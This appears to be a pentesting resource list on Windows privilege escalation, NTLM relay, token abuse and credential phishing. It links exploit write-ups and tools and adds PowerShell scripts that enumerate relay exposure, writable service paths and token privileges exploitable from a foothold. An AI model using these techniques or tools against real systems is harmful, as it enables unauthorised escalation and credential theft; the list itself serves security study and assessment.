- In this article we will examine how the combination of two good security solutions with no apparent connection to each other can lead to the takeover of all workstations in a Windows environment. The main advantage of this technique is that it is exploitable in black box, i.e. without any prior knowledge of the target.
- Who Can See LAPS Passwords? - David Rowe
- Credential Dumping: LAPS - Kavish Tyagi(2020)
-
Local Phishing
-
Articles/Blogposts/Writeups
- Ask and ye shall receive - Impersonating everyday applications for profit - FoxIT
- Phishing for Credentials: If you want it, just ask! - enigma0x3
- Phishing Windows Credentials - NetbiosX
- Credentials Collection via CredUIPromptForCredentials - @spottheplanet
- ICU: A Red Teamer’s Hail Mary - Jean Maes
- Phishing Windows Credentials - NetbiosX(2020)
-
Tools
-
Invoke-CredentialPhisher
- The first one is a PowerShell script to send toast notifications on behalf of an (installed) application or the computer itself. The user will be asked to supply credentials once they click on the notification toast. The second one is a Cobalt Strike module to launch the phishing attack on connected beacons.
- Powershell Popups + Capture - mubix(2015)
- Invoke-CredentialsPhish.ps1
-
Invoke-LoginPrompt
- Invokes a Windows Security Login Prompt and outputs the clear text password.
-
CredsLeaker
- Credsleaker allows an attacker to craft a highly convincing credentials prompt using Windows Security, validate it against the DC and in turn leak it via an HTTP request.
-
Articles/Blogposts/Writeups
-
Logic Bugs
- Introduction to Logical Privilege Escalation on Windows - James Forshaw
- Windows Logical EoP Workbook
-
Abusing Token Privileges For EoP
- This repository contains all code and a Phrack-style paper on research into abusing token privileges for escalation of privilege. Please feel free to ping us with questions, ideas, insults, or bugs.
- awesome_windows_logical_bugs
-
Named Pipes
- Discovering and Exploiting Named Pipe Security Flaws for Fun and Profit - Blake Watts(2002)
- Named Pipe Filename Local Privilege Escalation - Securiteam(2003)
- Windows Named Pipes & Impersonation - decoder.cloud(2019)
- Windows NamedPipes 101 + Privilege Escalation - @spottheplanet
- Part I: The Fundamentals of Windows Named Pipes - Robert Hawes
- Part II: Analysis of a Vulnerable Microsoft Windows Named Pipe Application - Robert Hawes
-
Privileged File Operation Abuse
- James Forshaw's work
-
Articles/Blogposts/Writeups
- Windows 10^H^H Symbolic Link Mitigations - James Forshaw(2015)
- Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read - James Forshaw(2017)
- Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw(2018)
-
An introduction to privileged file operation abuse on Windows - @clavoillotte
- TL;DR This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs.
- CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service - Ryan Hanson(2018)
- Escalating Privileges with CylancePROTECT - Ryan Hanson(2018)
- CVE-2020–1088 — Yet another arbitrary delete EoP - Søren Fritzbøger(2020)
-
From directory deletion to SYSTEM shell - Jonas L(2020)
- "Vulnerabilities that enable an unprivileged profile to make a service (that is running in the SYSTEM security context) delete an arbitrary directory/file are not a rare occurrence. These vulnerabilities are mostly ignored by security researchers on the hunt as there is no established path to escalation of privilege using such a primitive technique. By chance I have found such a path using an unlikely quirk in the Windows Error Reporting Service. The technical details are neither brilliant nor novel, though a writeup has been requested by several Twitter users."
- Code
- Weaponizing Privileged File Writes with the USO Service - Part 1/2 - itm4n(2019)
-
DACL Permissions Overwrite Privilege Escalation (CVE-2019-0841) - Nabeel Ahmed(2019)
- This vulnerability allows low-privileged users to hijack files that are owned by NT AUTHORITY\SYSTEM by overwriting the permissions on the targeted file. Successful exploitation results in "Full Control" permissions for the low-privileged user.
-
CVE-2020-1170 - Microsoft Windows Defender Elevation of Privilege Vulnerability - itm4n(2020)
- "Here is my writeup about CVE-2020-1170, an elevation of privilege bug in Windows Defender."
- Talks/Presentations/Videos
-
Tools
-
UsoDllLoader
- This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo), which was fixed by Microsoft starting from build version 1903.
-
NTLM-related
- Search "NTLM" in the 'Network_Attacks.md' page.
- Articles/Blogposts/Writeups
-
NTLM Reflection
- Windows: DCOM DCE/RPC Local NTLM Reflection Elevation of Privilege
- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
-
Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema
- Earlier this week, Microsoft issued patches for CVE-2019-1040, which is a vulnerability that allows for bypassing of NTLM relay mitigations. The vulnerability was discovered by Marina Simakov and Yaron Zinar (as well as several others credited in the Microsoft advisory), and they published a technical write-up about the vulnerability here. The short version is that this vulnerability allows for bypassing of the Message Integrity Code in NTLM authentication. The impact of this however, is quite big if combined with the Printer Bug discovered by Lee Christensen and some of my own research that builds forth on the Kerberos research of Elad Shamir. Using a combination of these vulnerabilities, it is possible to relay SMB authentication to LDAP. This allows for Remote code execution as SYSTEM on any unpatched Windows server or workstation (even those that are in different Active Directory forests), and for instant escalation to Domain Admin via any unpatched Exchange server (unless Exchange permissions were reduced in the domain). The most important takeaway of this post is that you should apply the June 2019 patches as soon as possible.
-
CVE-2019-1040 scanner
- Checks for CVE-2019-1040 vulnerability over SMB. The script will establish a connection to the target host(s) and send an invalid NTLM authentication. If this is accepted, the host is vulnerable to CVE-2019-1040 and you can execute the MIC Remove attack with ntlmrelayx. Note that this does not generate failed login attempts as the login information itself is valid, it is just the NTLM message integrity code that is absent, which is why the authentication is refused without increasing the badpwdcount.
-
NTLM Relay
-
Articles/Blogposts/Writeups
- Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) - byt3bl33d3r
- NTLM Relay - Pixis
- Playing with Relayed Credentials - @agsolino(2018)
- Server Message Block: SMB Relay Attack (Attack That Always Works) - CQURE Academy
- An SMB Relay Race – How To Exploit LLMNR and SMB Message Signing for Fun and Profit - Jordan Drysdale
- Effective NTLM / SMB Relaying - mubix
- SMB Relay with Snarf - Jeff Dimmock
- Responder with NTLM relay and Empire - chryzsh
-
What is old is new again: The Relay Attack - @0xdeaddood, @agsolino(2020)
- The purpose of this blog post is to present a new approach to ntlmrelayx.py allowing multi-relay attacks, that means, using just a single connection to attack several targets. On top of this, we added the capability of relaying connections for specific target users.
- Capturing and Relaying NTLM Authentication: Methods and Techniques - Acebond(2020)
- Mitigation
-
Articles/Blogposts/Writeups
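The relay posts above rely on a few host settings being at their defaults. As an added example, not taken from any linked post or tool, the following PowerShell reads the local settings that decide whether a relayed NTLM authentication lands on this host: SMB server signing, SMB1, LDAP signing and channel binding on a domain controller, the LM compatibility level, and whether the WebClient service used for WebDAV-based coercion is running. The findings list and its thresholds are my own summary of the linked material; Get-SmbServerConfiguration needs an elevated prompt, the registry reads do not.

```powershell
# Added example: report the local settings that govern NTLM relay exposure and
# turn them into findings. Values that do not apply (LDAP settings on a member
# server, a missing LmCompatibilityLevel meaning "OS default") come back $null.

function Get-NtlmRelayExposure {
    $smbServer = Get-SmbServerConfiguration

    # LDAP hardening lives under NTDS and only exists on domain controllers.
    $ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
    $ldapSigning = (Get-ItemProperty -Path $ntds -Name LDAPServerIntegrity -ErrorAction SilentlyContinue).LDAPServerIntegrity
    $ldapCbt     = (Get-ItemProperty -Path $ntds -Name LdapEnforceChannelBinding -ErrorAction SilentlyContinue).LdapEnforceChannelBinding

    # LmCompatibilityLevel below 3 lets this host send LM / NTLMv1 responses.
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $lmLevel = (Get-ItemProperty -Path $lsa -Name LmCompatibilityLevel -ErrorAction SilentlyContinue).LmCompatibilityLevel

    # A running WebClient service is what makes HTTP/WebDAV coercion from this host work.
    $webclient = (Get-Service -Name WebClient -ErrorAction SilentlyContinue).Status

    [pscustomobject]@{
        SmbServerSigningRequired  = $smbServer.RequireSecuritySignature
        Smb1Enabled               = $smbServer.EnableSMB1Protocol
        LdapServerIntegrity       = $ldapSigning   # 2 = signing required (DC only)
        LdapEnforceChannelBinding = $ldapCbt       # 2 = always enforce (DC only)
        LmCompatibilityLevel      = $lmLevel       # 5 = NTLMv2 only, refuse LM and NTLMv1
        WebClientService          = $webclient
    }
}

function Test-NtlmRelayHardened {
    param([Parameter(Mandatory)]$Exposure)
    $findings = @()
    if (-not $Exposure.SmbServerSigningRequired) {
        $findings += 'SMB server does not require signing: relayed SMB authentication to this host succeeds'
    }
    if ($Exposure.Smb1Enabled) {
        $findings += 'SMB1 enabled'
    }
    if ($null -ne $Exposure.LdapServerIntegrity -and $Exposure.LdapServerIntegrity -lt 2) {
        $findings += 'LDAP signing not required on this DC: SMB-to-LDAP relay (the CVE-2019-1040 chain) works'
    }
    if ($null -ne $Exposure.LdapEnforceChannelBinding -and $Exposure.LdapEnforceChannelBinding -lt 2) {
        $findings += 'LDAPS channel binding not enforced on this DC'
    }
    if ($null -ne $Exposure.LmCompatibilityLevel -and $Exposure.LmCompatibilityLevel -lt 3) {
        $findings += 'LM / NTLMv1 responses allowed: captured hashes crack and downgrade easily'
    }
    if ($Exposure.WebClientService -eq 'Running') {
        $findings += 'WebClient running: WebDAV-based coercion and HTTP relay from this host possible'
    }
    $findings
}

$exposure = Get-NtlmRelayExposure
$exposure | Format-List
Test-NtlmRelayHardened -Exposure $exposure
```

Server-side signing is the setting that actually stops relay to a host; a client-side signing requirement only protects the session after authentication, by which point the NTLM messages have already been forwarded, so it is deliberately not counted as a mitigation here.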
-
Hot Potato
-
Hot Potato
- Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.
- Hot Potato
- SmashedPotato
-
Ghost Potato
-
Ghost Potato - shenaniganslabs.io(2019)
- Halloween has come and gone, and yet NTLM reflection is back from the dead to haunt MSRC once again. This post describes a deceptively simple bug that has existed in Windows for 15 years. NTLM reflection is still possible through a highly reliable timing attack. The attack works by abusing the logic responsible for its mitigation, a widely speculated challenge cache. Attackers can purge this cache by deliberately failing an authentication attempt and doing so removes all challenge entries older than 5 minutes.
-
Tools
-
Snarf
- Snarf man-in-the-middle / relay suite
-
eternalrelayx.py — Non-Admin NTLM Relaying & ETERNALBLUE Exploitation - Kory Findley
- In this post, we will cover how to perform the EternalRelay attack, an attack technique which reuses non-Admin SMB connections during an NTLM Relay attack to launch ETERNALBLUE against hosts running affected versions of the Windows operating system. This attack provides an attacker with the potential to achieve remote code execution in the privilege context of SYSTEM against vulnerable Windows hosts without the need for local Administrator privileges or credentials.
-
Responder
- Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
-
Privilege Abuse
-
Priv2Admin
- Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.
-
Privileged File Operations
-
101
-
An introduction to privileged file operation abuse on Windows - @clavoillotte(2019)
- TL;DR This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs.
- Articles/Blogposts/Writeups
-
101
-
Registry Paths/Permissions
- Insecure Registry Permissions - NetbiosX
-
RegSLScan
- This tool scans registry keys under Local Machine (HKLM) and lists any keys in which non-admins have access to create symbolic links.
- Services
-
Service Abuse
- Articles/Blogposts/Writeups
-
Tools
-
FullPowers
- FullPowers is a Proof-of-Concept tool I made for automatically recovering the default privilege set of a service account including SeAssignPrimaryToken and SeImpersonate.
-
Unquoted Service Paths
- Articles/Blogposts/Writeups
- Tools
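Relative-path DLL planting (the DLL Hijacking section above) and unquoted service paths share one precondition: a directory the current user can write to that a privileged process will search before it reaches the real file. The following PowerShell is an added example covering both checks, not code from PowerUp, Robber or any other linked tool. It assumes creating and deleting a small temporary file in each candidate directory is an acceptable side effect; that probe is used instead of ACL parsing so that inherited denies, integrity levels and nested groups are evaluated by the kernel rather than reimplemented.

```powershell
# Added example: find user-writable directories in the two places a privileged
# process will look for a file that is not where it expects it.

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Path)
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllBytes($probe, [byte[]](0))
        Remove-Item -LiteralPath $probe -Force
        $true
    } catch { $false }
}

# 1. PATH directories. With SafeDllSearchMode on (the default) a DLL missing from
#    the application directory, System32, System, Windows and the current directory
#    is finally looked up in PATH, so a writable PATH entry feeds a DLL to any
#    privileged process with such a gap (the Task Scheduler DLL-planting post is one).
function Get-WritablePathDirectory {
    $seen = @{}
    foreach ($entry in ($env:PATH -split ';')) {
        $dir = $entry.Trim().TrimEnd('\')
        if (-not $dir -or $seen.ContainsKey($dir.ToLowerInvariant())) { continue }
        $seen[$dir.ToLowerInvariant()] = $true
        $exists = Test-Path -LiteralPath $dir -PathType Container
        $parent = Split-Path -Path $dir -Parent
        [pscustomobject]@{
            Directory = $dir
            Exists    = $exists
            Writable  = $exists -and (Test-DirectoryWritable -Path $dir)
            # A PATH entry that does not exist, but whose parent is writable, can simply be created.
            Creatable = (-not $exists) -and $parent -and (Test-Path -LiteralPath $parent) -and (Test-DirectoryWritable -Path $parent)
        }
    }
}

# 2. Unquoted service paths. For C:\Program Files\Vendor Name\Agent\svc.exe the
#    service control manager tries C:\Program.exe, then "C:\Program Files\Vendor.exe",
#    then the real path; a writable directory along the way lets the user plant the
#    binary SCM runs, as the service account, at the next service start.
function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' -and $_.PathName -match '\s' } |
        ForEach-Object {
            $svc = $_
            # Drop arguments: the binary path ends at the first .exe/.sys token.
            $exe = if ($svc.PathName -match '^(.*?\.(exe|sys))(\s|$)') { $Matches[1] } else { $svc.PathName }
            if ($exe -like "$env:SystemRoot\*") { return }   # System32 and friends are not user-writable
            $parts = $exe -split ' '
            $plantable = for ($i = 1; $i -lt $parts.Count; $i++) {
                $prefix = $parts[0..($i - 1)] -join ' '      # what SCM would try, minus ".exe"
                $dir = Split-Path -Path $prefix -Parent
                if ($dir -and (Test-Path -LiteralPath $dir) -and (Test-DirectoryWritable -Path $dir)) { "$prefix.exe" }
            }
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                ImagePath = $svc.PathName
                Plantable = @($plantable)
            }
        }
}

Get-WritablePathDirectory | Where-Object { $_.Writable -or $_.Creatable } | Format-Table -AutoSize
Get-UnquotedServicePath | Where-Object { $_.Plantable.Count -gt 0 } | Format-Table -AutoSize -Wrap
```

The unquoted-path check deliberately stops before the real binary's own directory: being able to overwrite the service executable itself is the separate "weak service binary permissions" case, and it is worth reporting separately because it does not depend on the path being unquoted.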
- Stored Creds/Passwords on disk
-
Tokens
-
Articles/Blogposts/Writeups
- Abusing Token Privileges For LPE - drone/breenmachine
- Post-Exploitation with “Incognito”. - Ignacio Sorribas
-
The Art of Becoming TrustedInstaller
- There are many ways of getting the TI token other than these 3 techniques. For example, as Vincent Yiu pointed out on Twitter, if you've got easy access to a system token, say using Metasploit's getsystem command, you can impersonate system and then open the TI token; it's just IMO less easy :-). If you get a system token with SeTcbPrivilege you can also call LogonUserExExW or LsaLogonUser, where you can specify a set of additional groups to apply to a service token. Finally, if you get a system token with SeCreateTokenPrivilege (say from LSASS.exe if it's not running PPL) you can craft an arbitrary token using the NtCreateToken system call.
- c:\whoami /priv - [show me your privileges and I will lead you to SYSTEM] - Andrea Pierini
- Windows: DCOM DCE/RPC Local NTLM Reflection Elevation of Privilege
- Account Hunting for Invoke-TokenManipulation - TrustedSec
- Tokenvator: A Tool to Elevate Privilege using Windows Tokens - Alexander Polce Leary
- Tokenvator: Release 2 - Alexander Leary
- Abusing SeLoadDriverPrivilege for privilege escalation - TarLogic
- The power of backup operators - decoder.cloud
- Token Manipulation
-
Talks & Presentations
-
Social Engineering The Windows Kernel: Finding And Exploiting Token Handling Vulnerabilities - James Forshaw - BHUSA2015
- Slides
- One successful technique in social engineering is pretending to be someone or something you're not and hoping the security guard who's forgotten their reading glasses doesn't look too closely at your fake ID. Of course there's no hyperopic guard in the Windows OS, but we do have an ID card, the Access Token, which proves our identity to the system and lets us access secured resources. The Windows kernel provides simple capabilities to identify fake Access Tokens, but sometimes the kernel or other kernel-mode drivers are too busy to use them correctly. If a fake token isn't spotted during a privileged operation, local elevation of privilege or information disclosure vulnerabilities can be the result. This could allow an attacker to break out of an application sandbox, elevate to administrator privileges, or even compromise the kernel itself. This presentation is about finding and then exploiting the incorrect handling of tokens in the Windows kernel as well as first and third party drivers. Examples of serious vulnerabilities, such as CVE-2015-0002 and CVE-2015-0062, will be presented. It will provide clear exploitable patterns so that you can do your own security reviews for these issues. Finally, I'll discuss some of the ways of exploiting these types of vulnerabilities to elevate local privileges.
-
Tools
-
Tokenvator
- A tool to alter privilege with Windows Tokens
-
token_manipulation
- Bypass User Account Control by manipulating tokens (can bypass AlwaysNotify)
-
Potatoes
- Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM - @breenmachine
- Rotten Potato Privilege Escalation from Service Accounts to SYSTEM - Stephen Breen Chris Mallz - Derbycon6
-
RottenPotatoNG
- New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools.
- The lonely potato - decoder.cloud(2017)
-
No more rotten/juicy potato? - decoder.cloud(2018)
- Rotten potato inadvertently patched on Win10 1809
- Potatoes and tokens - decoder.cloud(2018)
- Juicy Potato (abusing the golden privileges) - Andrea Pierini, Giuseppe Trotta(2018)
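The Potato family, Priv2Admin and the token posts above each start from one privilege already present in the current token. The following is an added PowerShell example, not code from any linked project, that parses whoami /priv and annotates the privileges with a documented route to SYSTEM; the privilege-to-route table is my own summary of the linked posts, not something Windows reports.

```powershell
# Added example: list the privileges held by the current token and flag the ones
# that are, by themselves, a known route to SYSTEM. A "Disabled" privilege is
# still held: the process can turn it on with AdjustTokenPrivileges, so the
# state column is not a mitigation, only a hint at what the caller already uses.

function Get-TokenPrivilege {
    # whoami /priv rows look like:
    #   SeImpersonatePrivilege  Impersonate a client after authentication  Enabled
    # Only the first column is locale-independent, so the header is ignored and
    # rows are matched on the privilege name.
    foreach ($line in (& whoami.exe /priv)) {
        if ($line -notmatch '^(Se\w+Privilege)\s{2,}(.*?)\s{2,}(\S+)\s*$') { continue }
        [pscustomobject]@{ Name = $Matches[1]; Description = $Matches[2]; State = $Matches[3] }
    }
}

# Assumption: this mapping summarises the posts in this section (Potatoes,
# Priv2Admin, SeLoadDriverPrivilege, backup operators, TrustedInstaller).
$script:EscalationRoute = @{
    'SeImpersonatePrivilege'        = 'Potato family: coerce a SYSTEM client to authenticate to you, then impersonate it'
    'SeAssignPrimaryTokenPrivilege' = 'Same coercion, then CreateProcessAsUser with the captured token'
    'SeBackupPrivilege'             = 'Read any file regardless of ACL (SAM/SYSTEM hives, NTDS.dit on a DC)'
    'SeRestorePrivilege'            = 'Write any file or registry key regardless of ACL (swap a service binary)'
    'SeTakeOwnershipPrivilege'      = 'Take ownership, then grant yourself write on any securable object'
    'SeDebugPrivilege'              = 'Open any process: inject into, or duplicate the token of, a SYSTEM process'
    'SeLoadDriverPrivilege'         = 'Load a signed but vulnerable driver (TarLogic post above)'
    'SeTcbPrivilege'                = 'Act as part of the OS: LsaLogonUser with extra groups, as in the TrustedInstaller post'
    'SeCreateTokenPrivilege'        = 'NtCreateToken: forge an arbitrary token'
    'SeManageVolumePrivilege'       = 'Raw volume handle: write anywhere on the disk regardless of file ACLs'
}

function Get-EscalationPrivilege {
    foreach ($priv in Get-TokenPrivilege) {
        if ($script:EscalationRoute.ContainsKey($priv.Name)) {
            [pscustomobject]@{
                Privilege = $priv.Name
                State     = $priv.State
                Route     = $script:EscalationRoute[$priv.Name]
            }
        }
    }
}

Get-EscalationPrivilege | Format-Table -AutoSize -Wrap
```

Run it from the shell you actually landed in (a web shell under IIS, a service account, a scheduled task) rather than from an interactive logon: SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege are exactly the ones service accounts hold by default and interactive users do not, which is why the Potato techniques above are so often the step after a foothold.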
-
Articles/Blogposts/Writeups
-
PentestLab Windows PrivEsc Writeup List
- Secondary Logon Handle
- Insecure Registry Permissions
- Intel SYSRET
- Weak Service Permissions Obtaining System Privileges
- The “SYSTEM” challenge
- Writeup of achieving system from limited user privs.
- All roads lead to SYSTEM - MWR InfoSecurity (https://labs.mwrinfosecurity.com/system/assets/760/original/Windows_Services_-_All_roads_lead_to_SYSTEM.pdf)
- Alternative methods of becoming SYSTEM - Adam Chester(2017)
- admin to SYSTEM win7 with remote.exe - carnal0wnage
- Getting a CMD prompt as SYSTEM in Windows Vista and Windows Server 2008 - blogs.technet
-
Another way to get to a system shell – Assistive Technology - oddvar.moe
- Manipulate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\magnifier: set StartExe so that pressing WinKey and Plus (zoom) runs another binary.
- Can load the binary from WebDAV, and can also start a web browser and browse to a desired link.
- Runs the command as SYSTEM during the UAC prompt and at the logon screen.
-
Talks/Videos
- Hacking Windows through the Windows API; delves into the Windows API and how it can break itself
- Sedating the Watchdog: Abusing Security Products to Bypass Windows Protections - Tomer Bitton - BSidesSF
- Black hat talk on Windows Privilege Escalation
- Level Up! - Practical Windows Privilege Escalation
-
Extreme Privilege Escalation on Windows 8 UEFI Systems
- Slides
- Summary by stormehh from reddit: “In this whitepaper (and accompanying Defcon/Blackhat presentations), the authors demonstrate vulnerabilities in the UEFI "Runtime Service" interface accessible by a privileged userland process on Windows 8. This paper steps through the exploitation process in great detail and demonstrates the ability to obtain code execution in SMM and maintain persistence by means of overwriting SPI flash”
- The Travelling Pentester: Diaries of the Shortest Path to Compromise
- Windows Privilege Escalation - Riyaz Walikar
-
Privilege Escalation FTW - MalwareJake(WWHF2018)
- Often you don't land in a penetration test with full admin rights. How can you fix that? In most networks it's easier than you might think. In this session, Jake will discuss and demonstrate various privilege escalation techniques that are possible primarily due to misconfigurations. Practically every network has one or more misconfigurations that let you easily escalate from random Joe to total pro. We'll examine some common issues present in both Windows and Linux so you can level up for your next penetration test.
- Abusing privileged file operations on Windows - Clement Lavoillotte(Troopers19)
-
Tools
-
Windows Exploit Suggester
- Blogpost: https://blog.gdssecurity.com/labs/2014/7/11/introducing-windows-exploit-suggester.html
- This tool compares a target's patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
-
PowerUp
- Windows Privilege Escalation through Powershell
-
ElevateKit
- The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.
-
BeRoot
- BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.
-
Pompem
- Pompem is an open-source tool designed to automate the search for exploits and vulnerabilities in the most important databases. Developed in Python, it has an advanced search system that helps the work of pentesters and ethical hackers. In the current version it searches PacketStorm Security, CXSecurity, ZeroDay, Vulners, the National Vulnerability Database and the WPScan Vulnerability Database.
-
AccessChk
- As a part of ensuring that they've created a secure environment Windows administrators often need to know what kind of accesses specific users or groups have to resources including files, directories, Registry keys, global objects and Windows services. AccessChk quickly answers these questions with an intuitive interface and output.
- AutoDane at BSides Cape Town
-
Auto DANE
- Auto DANE attempts to automate the process of exploiting, pivoting and escalating privileges on windows domains.
-
lonelypotato
- Modified version of RottenPotatoNG C++
- Blogpost
-
psgetsystem
- getsystem via parent process using ps1 and embedded C#
-
Sherlock
- PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
-
Robber
- Robber is an open-source tool for finding executables prone to DLL hijacking
- WinPrivCheck.bat
-
JAWS - Just Another Windows (Enum) Script
- JAWS is a PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so it 'should' run on every Windows version since Windows 7.
-
Windows Exploit Suggester - Next Generation (WES-NG)
- WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.
-
Powerless
- "A Windows privilege escalation (enumeration) script designed with OSCP labs (i.e. legacy Windows machines without Powershell) in mind. The script represents a conglomeration of various privilege escalation checks, gathered from various sources, all done via native Windows binaries present in almost every version of Windows." - It's a batch file
-
Writeups
-
To-be-sorted
-
Analyzing local privilege escalations in win32k
- This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.
Windows-Privilege-Escalation - frizb
- Windows Privilege Escalation Techniques and Scripts
- Some forum posts on Win Priv Esc
- Post Exploitation Using netNTLM Downgrade attacks - Fishnet/Archive.org
- Old Privilege Escalation Techniques
- Windows 7 ‘Startup Repair’ Authentication Bypass
Windows Privilege Escalation Guide - sploitspren(2018)
- Nice methodology/walk-through of Windows PrivEsc methods and tactics
- Windows Privilege Escalation Methods for Pentesters - pentest.blog
- Linux Vulnerabilities Windows Exploits: Escalating Privileges with WSL - BlueHat IL 2018 - Saar Amar
- CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service - Ryan Hanson
- Windows 10 Privilege Escalation using Fodhelper - hackercool
- Local privilege escalation via the Windows I/O Manager: a variant finding collaboration - swiat
- Abusing SeLoadDriverPrivilege for privilege escalation - Oscar Mallo
- Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw
CVE-2020-0668 - A Trivial Privilege Escalation Bug in Windows Service Tracing - itm4n
- "In this post, I’ll discuss an arbitrary file move vulnerability I found in Windows Service Tracing. From my testing, it affected all versions of Windows from Vista to 10 but it’s probably even older because this feature was already present in XP."
- Issue 1554: Windows: Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix EoP - Project0
- Waves Maxx Audio DLL Side-Loading LPE via Windows Registry - Robert Hawes
ALPC
- Original
zeroday-powershell
- A PowerShell example of the Windows zero-day priv esc (the 2018 Task Scheduler ALPC bug, CVE-2018-8440)
Anti-Virus Software
- #AVGater: Getting Local Admin by Abusing the Anti-Virus Quarantine
- CVE-2018-8955: Bitdefender GravityZone Arbitrary Code Execution - Kyriakos Economou
- COModo: From Sandbox to SYSTEM (CVE-2019–3969) - David Wells
- Reading Physical Memory using Carbon Black's Endpoint driver - Bill Demirkapi
- SEPM-EoP
- Exploiting STOPzilla AntiMalware Arbitrary Write Vulnerability using SeCreateTokenPrivilege - Parvez
- Analysis and Exploitation of an ESET Vulnerability - Tavis Ormandy(2015)
Compromised by Endpoint Protection - codewhitesec.blogspot
- Symantec Endpoint Protection vulns
- Escalating Privileges with CylancePROTECT - Ryan Hanson
- Avira Optimizer Local Privilege Escalation - Enigma0x3
Other
- One more Steam Windows Client Local Privilege Escalation 0day - Vasily Kravets
Local Privilege Escalation on Dell machines running Windows - Bill Demirkapi
- This blog post will cover my research into a Local Privilege Escalation vulnerability in Dell SupportAssist. Dell SupportAssist is advertised to “proactively check the health of your system’s hardware and software”. Unfortunately, Dell SupportAssist comes pre-installed on most new Dell machines running Windows. If you’re on Windows, never heard of this software, and have a Dell machine - chances are you have it installed.
CVE-2019-9730: LPE in Synaptics Sound Device Driver - @Jackson_T
- CVE details for a COM-based local privilege elevation with a brief write-up on discovery to root.
- Technical Advisory: Intel Driver Support & Assistance – Local Privilege Escalation - NCCGroup
- Elastic Boundaries – Elevating Privileges by Environment Variables Expansion - Yoam Gottesman
- DisplayLink USB Graphics Software arbitrary file write Elevation of Privilege - Yannick Méheut(2020)
To-be-sorted
Exploits
CVE-2017-8759
- Exploit toolkit CVE-2017-8759 - v1.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.
Win10-LPE
- The Windows 10 LPE exploit written by SandboxEscaper. This includes the source code for the original exploit, a precompiled DLL injector binary included with the original source, and a powershell script to find potentially vulnerable libraries to overwrite for the exploit.
- Component Services Volatile Environment LPE - bytecode77
CVE-2018-0952-SystemCollector
- PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service
- CVE-2018-8420
- CVE-2018-8440 - PowerShell PoC
Remote Code Execution — Gaining Domain Admin due to a typo: CVE-2018-9022 - Daniel C
- A short time ago as part of a red team engagement I found and successfully exploited a remote code execution vulnerability that resulted in us quickly gaining high privilege access to the customer's internal network. So far nothing sounds too out of the ordinary, however interestingly the root cause of this vulnerability was due to a two character typo.
- Another Local Privilege Escalation Vulnerability Using Process Creation Impersonation - Wayne Chin Yick Low
- XIGNCODE3 xhunter1.sys LPE - x86.re
- Display Languages Volatile Environment LPE - bytecode77
- Performance Monitor Volatile Environment LPE
- Enter Product Key Volatile Environment LPE
- Sysprep Volatile Environment LPE(2017)
- Remote Assistance Volatile Environment LPE
- CVE-2017-12478 - Unitrends 9.x api_storage exploit
CVE-2020-0668
- Use CVE-2020-0668 to perform an arbitrary privileged file move operation.
CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver - Jackson_T
- TL;DR: CVE for driver-based LPE with an in-depth tutorial on discovery to root and details on two new tools.
CVE-2020-0787 - Windows BITS - An EoP Bug Hidden in an Undocumented RPC Function - itm4n
